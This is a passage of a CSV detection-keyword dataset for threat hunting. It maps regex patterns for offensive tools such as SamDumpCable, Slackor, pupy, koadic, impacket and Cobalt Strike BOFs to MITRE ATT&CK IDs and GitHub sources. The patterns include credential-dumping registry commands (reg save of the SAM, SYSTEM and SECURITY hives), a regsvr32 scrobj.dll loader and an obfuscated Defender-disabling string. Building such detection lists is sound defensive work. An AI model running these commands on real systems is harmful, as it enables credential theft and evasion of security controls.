TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*reg save hklm\sam 1337*",".{0,1000}reg\ssave\shklm\\sam\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg save hklm\system 1337*",".{0,1000}reg\ssave\shklm\\system\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg.exe query hklm\security\policy\secrets*",".{0,1000}reg\.exe\squery\shklm\\security\\policy\\secrets.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*reg.exe save HKLM\SAM sam_*",".{0,1000}reg\.exe\ssave\sHKLM\\SAM\ssam_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\sam*",".{0,1000}reg\.exe\ssave\shklm\\sam.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SECURITY security_*",".{0,1000}reg\.exe\ssave\sHKLM\\SECURITY\ssecurity_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\security*",".{0,1000}reg\.exe\ssave\shklm\\security.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SYSTEM sys*",".{0,1000}reg\.exe\ssave\sHKLM\\SYSTEM\ssys.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\system*",".{0,1000}reg\.exe\ssave\shklm\\system.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.py *@* save -keyName 'HKLM\SAM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SAM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reg.py *@* save -keyName 'HKLM\SECURITY*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SECURITY.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reg.py *@* save -keyName 'HKLM\SYSTEM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SYSTEM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reGeorg-master*",".{0,1000}reGeorg\-master.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*reGeorgSocksProxy.py*",".{0,1000}reGeorgSocksProxy\.py.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*register-python-argcomplete --no-defaults exegol*",".{0,1000}register\-python\-argcomplete\s\-\-no\-defaults\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*registry_hijacking_eventvwr*",".{0,1000}registry_hijacking_eventvwr.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*registry_hijacking_fodhelper*",".{0,1000}registry_hijacking_fodhelper.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*RegistryImplant*",".{0,1000}RegistryImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*registry-read.py*",".{0,1000}registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RegistryTinker.exe*",".{0,1000}RegistryTinker\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*RegReeper.7z*",".{0,1000}RegReeper\.7z.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.cpp*",".{0,1000}RegReeper\.cpp.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.exe*",".{0,1000}RegReeper\.exe.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.sln*",".{0,1000}RegReeper\.sln.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.vcxproj*",".{0,1000}RegReeper\.vcxproj.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*Reg-Restore-Persistence-Mole-main*",".{0,1000}Reg\-Restore\-Persistence\-Mole\-main.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*regsvr32.exe /s /n /u /i: * scrobj.dll*",".{0,1000}regsvr32\.exe\s\/s\s\/n\s\/u\s\/i\:\s.{0,1000}\sscrobj\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*regsvr32_command_delivery_server*",".{0,1000}regsvr32_command_delivery_server.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reinstall_original_pw.py*",".{0,1000}reinstall_original_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*rekallreader.py*",".{0,1000}rekallreader\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*relay*/utils/enum.py*",".{0,1000}relay.{0,1000}\/utils\/enum\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RelayPackets.py*",".{0,1000}RelayPackets\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Release of BloodHound*",".{0,1000}Release\sof\sBloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Release.Lime-Crypter.v0.5.1.exe.zip*",".{0,1000}Release\.Lime\-Crypter\.v0\.5\.1\.exe\.zip.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*release/mipsel_agent*",".{0,1000}release\/mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" 
"*Release-ReflectiveDLL\Implant.x64.pdb*",".{0,1000}Release\-ReflectiveDLL\\Implant\.x64\.pdb.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*rem call nthash-win64 /getntlmhash*",".{0,1000}rem\scall\snthash\-win64\s\/getntlmhash.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*rem cheap bruteforce ... very slow ... ok for a few passwords*",".{0,1000}rem\scheap\sbruteforce\s\.\.\.\svery\sslow\s\.\.\.\sok\sfor\sa\sfew\spasswords.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*REM getting browser history*",".{0,1000}REM\sgetting\sbrowser\shistory.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*REM Title: 
Harvester_OF_SORROW*",".{0,1000}REM\sTitle\:\sHarvester_OF_SORROW.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*REM wipe the logs*",".{0,1000}REM\swipe\sthe\slogs.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*-Rem@ov@eDef@ini@tio@ns -@Al@l*",".{0,1000}\-Rem\@ov\@eDef\@ini\@tio\@ns\s\-\@Al\@l.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*remiflavien1/recon-archy*",".{0,1000}remiflavien1\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping 
relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*-remote -destPipe * -pipeHost * -destHost *",".{0,1000}\-remote\s\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-destHost\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Remote Potato by @decoder_it and @splinter_code*",".{0,1000}Remote\sPotato\sby\s\@decoder_it\sand\s\@splinter_code.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*Remote/lastpass/lastpass.x86.*",".{0,1000}Remote\/lastpass\/lastpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/setuserpass/*",".{0,1000}Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/shspawnas*",".{0,1000}Remote\/shspawnas.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/suspendresume/*",".{0,1000}Remote\/suspendresume\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 